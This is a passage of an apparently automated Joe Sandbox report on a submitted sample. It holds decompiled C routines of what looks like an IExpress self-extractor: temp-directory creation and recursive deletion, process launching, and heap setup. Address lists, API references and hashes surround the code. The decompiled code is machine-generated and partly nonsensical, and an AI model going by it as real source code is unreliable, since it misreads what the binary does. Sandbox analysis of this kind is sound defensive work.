                                                                                                                                                                                                        					goto L12;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t28 = _t26 - 1;
                                                                                                                                                                                                        				if(_t28 == 0) {
                                                                                                                                                                                                        					_push("mips");
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t29 = _t28 - 1;
                                                                                                                                                                                                        				if(_t29 == 0) {
                                                                                                                                                                                                        					_push("alpha");
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t29 != 1) {
                                                                                                                                                                                                        					goto L12;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push("ppc");
                                                                                                                                                                                                        				goto L11;
                                                                                                                                                                                                        			}




















                                                                                                                                                                                                        0x00e85472
                                                                                                                                                                                                        0x00e85479
                                                                                                                                                                                                        0x00e85481
                                                                                                                                                                                                        0x00e85484
                                                                                                                                                                                                        0x00e8551c
                                                                                                                                                                                                        0x00e85521
                                                                                                                                                                                                        0x00e85528
                                                                                                                                                                                                        0x00e8552d
                                                                                                                                                                                                        0x00e8552f
                                                                                                                                                                                                        0x00e85539
                                                                                                                                                                                                        0x00e8554d
                                                                                                                                                                                                        0x00e8554d
                                                                                                                                                                                                        0x00e85552
                                                                                                                                                                                                        0x00e85585
                                                                                                                                                                                                        0x00e85585
                                                                                                                                                                                                        0x00e8558b
                                                                                                                                                                                                        0x00e8558d
                                                                                                                                                                                                        0x00e8559d
                                                                                                                                                                                                        0x00e8559d
                                                                                                                                                                                                        0x00e85557
                                                                                                                                                                                                        0x00e8555e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85560
                                                                                                                                                                                                        0x00e85566
                                                                                                                                                                                                        0x00e85569
                                                                                                                                                                                                        0x00e8556f
                                                                                                                                                                                                        0x00e8556f
                                                                                                                                                                                                        0x00e85581
                                                                                                                                                                                                        0x00e85581
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85581
                                                                                                                                                                                                        0x00e85545
                                                                                                                                                                                                        0x00e8557c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8557c
                                                                                                                                                                                                        0x00e85547
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85547
                                                                                                                                                                                                        0x00e8548a
                                                                                                                                                                                                        0x00e85490
                                                                                                                                                                                                        0x00e85497
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8549d
                                                                                                                                                                                                        0x00e854ab
                                                                                                                                                                                                        0x00e854b4
                                                                                                                                                                                                        0x00e854c0
                                                                                                                                                                                                        0x00e8550c
                                                                                                                                                                                                        0x00e85511
                                                                                                                                                                                                        0x00e85515
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85515
                                                                                                                                                                                                        0x00e854c9
                                                                                                                                                                                                        0x00e854d6
                                                                                                                                                                                                        0x00e854d8
                                                                                                                                                                                                        0x00e854fe
                                                                                                                                                                                                        0x00e85503
                                                                                                                                                                                                        0x00e85507
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85507
                                                                                                                                                                                                        0x00e854da
                                                                                                                                                                                                        0x00e854dd
                                                                                                                                                                                                        0x00e854f7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e854f7
                                                                                                                                                                                                        0x00e854df
                                                                                                                                                                                                        0x00e854e2
                                                                                                                                                                                                        0x00e854f0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e854f0
                                                                                                                                                                                                        0x00e854e7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e854e9
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E854C9
                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E8553D
                                                                                                                                                                                                        • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E8556F
                                                                                                                                                                                                          • Part of subcall function 00E853A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E853FB
                                                                                                                                                                                                          • Part of subcall function 00E853A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E85402
                                                                                                                                                                                                          • Part of subcall function 00E853A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E8541F
                                                                                                                                                                                                          • Part of subcall function 00E853A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E8542B
                                                                                                                                                                                                          • Part of subcall function 00E853A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E85434
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                        • API String ID: 1979080616-3374052426
                                                                                                                                                                                                        • Opcode ID: 8ba49a47cb06ca4c9d05ce1f18d4626a0d64bcea879d1b2630f1e4a2505f2c1e
                                                                                                                                                                                                        • Instruction ID: f6521f717fbe4fa5b8823b66e32fbcadb26cccfe2956314c27b09381b3a4d1d8
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8ba49a47cb06ca4c9d05ce1f18d4626a0d64bcea879d1b2630f1e4a2505f2c1e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 71312972B00B005FCB14BF3AAD455BF779FAB81744B0821AAA80EF2591DF70CE068795
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E00E82390(CHAR* __ecx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v276;
                                                                                                                                                                                                        				char _v280;
                                                                                                                                                                                                        				char _v284;
                                                                                                                                                                                                        				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                        				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t21;
                                                                                                                                                                                                        				int _t36;
                                                                                                                                                                                                        				void* _t46;
                                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                                        				CHAR* _t65;
                                                                                                                                                                                                        				void* _t66;
                                                                                                                                                                                                        				signed int _t67;
                                                                                                                                                                                                        				signed int _t69;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                        				_t21 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                        				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                        				_t65 = __ecx;
                                                                                                                                                                                                        				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                        					L10:
                                                                                                                                                                                                        					_pop(_t62);
                                                                                                                                                                                                        					_pop(_t66);
                                                                                                                                                                                                        					_pop(_t46);
                                                                                                                                                                                                        					return E00E86CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					E00E81680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                        					_t58 = 0x104;
                                                                                                                                                                                                        					E00E816B3( &_v280, 0x104, "*");
                                                                                                                                                                                                        					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                        					_t63 = _t22;
                                                                                                                                                                                                        					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                        						goto L10;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						goto L3;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						L3:
                                                                                                                                                                                                        						_t58 = 0x104;
                                                                                                                                                                                                        						E00E81680( &_v276, 0x104, _t65);
                                                                                                                                                                                                        						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                        							_t58 = 0x104;
                                                                                                                                                                                                        							E00E816B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                        							SetFileAttributesA( &_v280, 0x80);
                                                                                                                                                                                                        							DeleteFileA( &_v280);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                                                                                                                                                        								E00E816B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                        								_t58 = 0x104;
                                                                                                                                                                                                        								E00E8658A( &_v280, 0x104, 0xe81140);
                                                                                                                                                                                                        								E00E82390( &_v284);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                        					} while (_t36 != 0);
                                                                                                                                                                                                        					FindClose(_t63); // executed
                                                                                                                                                                                                        					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                        					goto L10;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}





















                                                                                                                                                                                                        0x00e82398
                                                                                                                                                                                                        0x00e8239e
                                                                                                                                                                                                        0x00e823a3
                                                                                                                                                                                                        0x00e823a5
                                                                                                                                                                                                        0x00e823ae
                                                                                                                                                                                                        0x00e823b3
                                                                                                                                                                                                        0x00e824cb
                                                                                                                                                                                                        0x00e824d2
                                                                                                                                                                                                        0x00e824d3
                                                                                                                                                                                                        0x00e824d4
                                                                                                                                                                                                        0x00e824df
                                                                                                                                                                                                        0x00e823c2
                                                                                                                                                                                                        0x00e823d1
                                                                                                                                                                                                        0x00e823db
                                                                                                                                                                                                        0x00e823e4
                                                                                                                                                                                                        0x00e823f6
                                                                                                                                                                                                        0x00e823fc
                                                                                                                                                                                                        0x00e82401
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e82407
                                                                                                                                                                                                        0x00e82407
                                                                                                                                                                                                        0x00e82408
                                                                                                                                                                                                        0x00e82411
                                                                                                                                                                                                        0x00e8241f
                                                                                                                                                                                                        0x00e8247a
                                                                                                                                                                                                        0x00e82483
                                                                                                                                                                                                        0x00e82495
                                                                                                                                                                                                        0x00e824a3
                                                                                                                                                                                                        0x00e82421
                                                                                                                                                                                                        0x00e8242f
                                                                                                                                                                                                        0x00e82453
                                                                                                                                                                                                        0x00e8245d
                                                                                                                                                                                                        0x00e82466
                                                                                                                                                                                                        0x00e82472
                                                                                                                                                                                                        0x00e82472
                                                                                                                                                                                                        0x00e8242f
                                                                                                                                                                                                        0x00e824af
                                                                                                                                                                                                        0x00e824b5
                                                                                                                                                                                                        0x00e824be
                                                                                                                                                                                                        0x00e824c5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e824c5

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindFirstFileA.KERNELBASE(?,00E88A3A,00E811F4,00E88A3A,00000000,?,?), ref: 00E823F6
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(?,00E811F8), ref: 00E82427
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(?,00E811FC), ref: 00E8243B
                                                                                                                                                                                                        • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00E82495
                                                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00E824A3
                                                                                                                                                                                                        • FindNextFileA.KERNELBASE(00000000,00000010), ref: 00E824AF
                                                                                                                                                                                                        • FindClose.KERNELBASE(00000000), ref: 00E824BE
                                                                                                                                                                                                        • RemoveDirectoryA.KERNELBASE(00E88A3A), ref: 00E824C5
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 836429354-0
                                                                                                                                                                                                        • Opcode ID: 8b493b552decc041ce836f3d7d665da5636486134570914cdf112b4a0e943db9
                                                                                                                                                                                                        • Instruction ID: 0678f5b5acb939be746787a98c3e9b5dd6ca195b02e1c6114efb76ead3e4384c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8b493b552decc041ce836f3d7d665da5636486134570914cdf112b4a0e943db9
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 463192712047409FD320FB64DC8DAEB73ECABC4305F08592EB69DA6190EB34990D8762
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 675 e83fef-e84010 676 e8410a-e8411a call e86ce0 675->676 677 e84016-e8403b CreateProcessA 675->677 678 e84041-e8406e WaitForSingleObject GetExitCodeProcess 677->678 679 e840c4-e84101 call e86285 GetLastError FormatMessageA call e844b9 677->679 682 e84070-e84077 678->682 683 e84091 call e8411b 678->683 693 e84106 679->693 682->683 687 e84079-e8407b 682->687 688 e84096-e840b8 CloseHandle * 2 683->688 687->683 690 e8407d-e84089 687->690 691 e84108 688->691 692 e840ba-e840c0 688->692 690->683 694 e8408b 690->694 691->676 692->691 695 e840c2 692->695 693->691 694->683 695->693
                                                                                                                                                                                                        C-Code - Quality: 84%
                                                                                                                                                                                                        			E00E83FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v524;
                                                                                                                                                                                                        				long _v528;
                                                                                                                                                                                                        				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t20;
                                                                                                                                                                                                        				void* _t22;
                                                                                                                                                                                                        				int _t25;
                                                                                                                                                                                                        				intOrPtr* _t39;
                                                                                                                                                                                                        				signed int _t44;
                                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                                        				signed int _t50;
                                                                                                                                                                                                        				intOrPtr _t53;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t45 = __edx;
                                                                                                                                                                                                        				_t20 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                        				_t39 = __ecx;
                                                                                                                                                                                                        				_t49 = 1;
                                                                                                                                                                                                        				_t22 = 0;
                                                                                                                                                                                                        				if(__ecx == 0) {
                                                                                                                                                                                                        					L13:
                                                                                                                                                                                                        					return E00E86CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                        				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                        				if(_t25 == 0) {
                                                                                                                                                                                                        					 *0xe89124 = E00E86285();
                                                                                                                                                                                                        					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
                                                                                                                                                                                                        					_t45 = 0x4c4;
                                                                                                                                                                                                        					E00E844B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                        					_t49 = 0;
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					_t22 = _t49;
                                                                                                                                                                                                        					goto L13;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                        				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                        				_t44 = _v528;
                                                                                                                                                                                                        				_t53 =  *0xe88a28; // 0x0
                                                                                                                                                                                                        				if(_t53 == 0) {
                                                                                                                                                                                                        					_t34 =  *0xe89a2c; // 0x0
                                                                                                                                                                                                        					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                        						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                        						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                        							 *0xe89a2c = _t44;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				E00E8411B(_t34, _t44);
                                                                                                                                                                                                        				CloseHandle(_v544.hThread);
                                                                                                                                                                                                        				CloseHandle(_v544);
                                                                                                                                                                                                        				if(( *0xe89a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                        					goto L12;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}


















                                                                                                                                                                                                        0x00e83fef
                                                                                                                                                                                                        0x00e83ffa
                                                                                                                                                                                                        0x00e84001
                                                                                                                                                                                                        0x00e84008
                                                                                                                                                                                                        0x00e8400a
                                                                                                                                                                                                        0x00e8400b
                                                                                                                                                                                                        0x00e84010
                                                                                                                                                                                                        0x00e8410a
                                                                                                                                                                                                        0x00e8411a
                                                                                                                                                                                                        0x00e8411a
                                                                                                                                                                                                        0x00e8401c
                                                                                                                                                                                                        0x00e8401d
                                                                                                                                                                                                        0x00e8401e
                                                                                                                                                                                                        0x00e8401f
                                                                                                                                                                                                        0x00e84033
                                                                                                                                                                                                        0x00e8403b
                                                                                                                                                                                                        0x00e840ca
                                                                                                                                                                                                        0x00e840e9
                                                                                                                                                                                                        0x00e840f8
                                                                                                                                                                                                        0x00e84101
                                                                                                                                                                                                        0x00e84106
                                                                                                                                                                                                        0x00e84106
                                                                                                                                                                                                        0x00e84108
                                                                                                                                                                                                        0x00e84108
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e84108
                                                                                                                                                                                                        0x00e84049
                                                                                                                                                                                                        0x00e8405c
                                                                                                                                                                                                        0x00e84062
                                                                                                                                                                                                        0x00e84068
                                                                                                                                                                                                        0x00e8406e
                                                                                                                                                                                                        0x00e84070
                                                                                                                                                                                                        0x00e84077
                                                                                                                                                                                                        0x00e8407f
                                                                                                                                                                                                        0x00e84089
                                                                                                                                                                                                        0x00e8408b
                                                                                                                                                                                                        0x00e8408b
                                                                                                                                                                                                        0x00e84089
                                                                                                                                                                                                        0x00e84077
                                                                                                                                                                                                        0x00e84091
                                                                                                                                                                                                        0x00e8409c
                                                                                                                                                                                                        0x00e840a8
                                                                                                                                                                                                        0x00e840b8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e840c2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e840c2

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 00E84033
                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E84049
                                                                                                                                                                                                        • GetExitCodeProcess.KERNELBASE ref: 00E8405C
                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00E8409C
                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00E840A8
                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00E840DC
                                                                                                                                                                                                        • FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 00E840E9
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3183975587-0
                                                                                                                                                                                                        • Opcode ID: aa991c23a831e6ed6d7f824d1314177df588d393f7e0609da2a8c56a89182c64
                                                                                                                                                                                                        • Instruction ID: 192f727747d7a7d6a695ebbab4b45a9eea507744f996b5ba1fd4b2f66a25d17c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: aa991c23a831e6ed6d7f824d1314177df588d393f7e0609da2a8c56a89182c64
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9931A4B1641218AFEB21AB66DC4DFAB77BCEB94705F1411AAF50DF21A1C6304D89CB11
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 70%
                                                                                                                                                                                                        			E00E82BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                                        				long _t4;
                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                        				intOrPtr _t7;
                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                        				struct HINSTANCE__* _t12;
                                                                                                                                                                                                        				intOrPtr* _t17;
                                                                                                                                                                                                        				signed char _t19;
                                                                                                                                                                                                        				intOrPtr* _t21;
                                                                                                                                                                                                        				void* _t22;
                                                                                                                                                                                                        				void* _t24;
                                                                                                                                                                                                        				intOrPtr _t32;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t4 = GetVersion();
                                                                                                                                                                                                        				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                        					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                        					if(_t12 != 0) {
                                                                                                                                                                                                        						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                        						if(_t21 != 0) {
                                                                                                                                                                                                        							_t17 = _t21;
                                                                                                                                                                                                        							 *0xe8a288(0, 1, 0, 0);
                                                                                                                                                                                                        							 *_t21();
                                                                                                                                                                                                        							_t29 = _t24 - _t24;
                                                                                                                                                                                                        							if(_t24 != _t24) {
                                                                                                                                                                                                        								_t17 = 4;
                                                                                                                                                                                                        								asm("int 0x29");
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t20 = _a12;
                                                                                                                                                                                                        				_t18 = _a4;
                                                                                                                                                                                                        				 *0xe89124 = 0;
                                                                                                                                                                                                        				if(E00E82CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                        					_t9 = E00E82F1D(_t18, _t20); // executed
                                                                                                                                                                                                        					_t22 = _t9; // executed
                                                                                                                                                                                                        					E00E852B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                        					if(_t22 != 0) {
                                                                                                                                                                                                        						_t32 =  *0xe88a3a; // 0x0
                                                                                                                                                                                                        						if(_t32 == 0) {
                                                                                                                                                                                                        							_t19 =  *0xe89a2c; // 0x0
                                                                                                                                                                                                        							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                        								E00E81F90(_t19, _t21, _t22);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t6 =  *0xe88588; // 0x0
                                                                                                                                                                                                        				if(_t6 != 0) {
                                                                                                                                                                                                        					CloseHandle(_t6);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t7 =  *0xe89124; // 0x80070002
                                                                                                                                                                                                        				return _t7;
                                                                                                                                                                                                        			}


















                                                                                                                                                                                                        0x00e82c03
                                                                                                                                                                                                        0x00e82c0d
                                                                                                                                                                                                        0x00e82c18
                                                                                                                                                                                                        0x00e82c20
                                                                                                                                                                                                        0x00e82c2e
                                                                                                                                                                                                        0x00e82c32
                                                                                                                                                                                                        0x00e82c36
                                                                                                                                                                                                        0x00e82c3d
                                                                                                                                                                                                        0x00e82c43
                                                                                                                                                                                                        0x00e82c45
                                                                                                                                                                                                        0x00e82c47
                                                                                                                                                                                                        0x00e82c49
                                                                                                                                                                                                        0x00e82c4e
                                                                                                                                                                                                        0x00e82c4e
                                                                                                                                                                                                        0x00e82c47
                                                                                                                                                                                                        0x00e82c32
                                                                                                                                                                                                        0x00e82c20
                                                                                                                                                                                                        0x00e82c50
                                                                                                                                                                                                        0x00e82c54
                                                                                                                                                                                                        0x00e82c57
                                                                                                                                                                                                        0x00e82c64
                                                                                                                                                                                                        0x00e82c66
                                                                                                                                                                                                        0x00e82c6b
                                                                                                                                                                                                        0x00e82c6d
                                                                                                                                                                                                        0x00e82c74
                                                                                                                                                                                                        0x00e82c76
                                                                                                                                                                                                        0x00e82c7c
                                                                                                                                                                                                        0x00e82c7e
                                                                                                                                                                                                        0x00e82c87
                                                                                                                                                                                                        0x00e82c89
                                                                                                                                                                                                        0x00e82c89
                                                                                                                                                                                                        0x00e82c87
                                                                                                                                                                                                        0x00e82c7c
                                                                                                                                                                                                        0x00e82c74
                                                                                                                                                                                                        0x00e82c8e
                                                                                                                                                                                                        0x00e82c95
                                                                                                                                                                                                        0x00e82c98
                                                                                                                                                                                                        0x00e82c98
                                                                                                                                                                                                        0x00e82c9e
                                                                                                                                                                                                        0x00e82ca7

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetVersion.KERNEL32(?,00000002,00000000,?,00E86BB0,00E80000,00000000,00000002,0000000A), ref: 00E82C03
                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00E86BB0,00E80000,00000000,00000002,0000000A), ref: 00E82C18
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00E82C28
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00E86BB0,00E80000,00000000,00000002,0000000A), ref: 00E82C98
                                                                                                                                                                                                        Strings
